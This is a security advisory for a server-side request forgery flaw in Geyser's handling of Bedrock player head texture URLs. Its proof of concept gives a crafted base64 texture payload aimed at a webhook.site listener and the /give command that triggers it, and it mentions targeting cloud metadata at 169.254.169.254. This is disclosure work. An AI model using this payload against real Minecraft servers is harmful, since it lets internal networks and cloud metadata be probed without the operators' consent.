Severity: Low (2.4) · Ecosystem: Maven

Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser

GHSA-xcfg-fcr5-gw9r · CVE-2026-42188


Description

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data.
By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.
This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.
However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

PoC

  1. Setup Environment:

    • Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
    • Ensure you have a Bedrock client connected.
  2. Prepare Listener:

    • Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).
  3. Construct Payload:

    • Create a JSON payload pointing to your listener URL:
      {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}
    • Encode this JSON string to Base64.
      (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)
  4. Execute Command:

    • Run the following command in the Bedrock Edition client:
      /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]
  5. Verify:

    • Check the webhook.site dashboard.
    • You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

  • Minecraft servers running Geyser
  • Server operators exposing internal or cloud metadata endpoints

Potential Impacts

  • Internal network probing (e.g., intranet services, admin panels)
  • Cloud metadata access attempts (e.g., 169.254.169.254)
  • IP address disclosure of the Minecraft server
  • Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

  • Network mapping
  • Firewall bypass attempts
  • Cloud environment fingerprinting
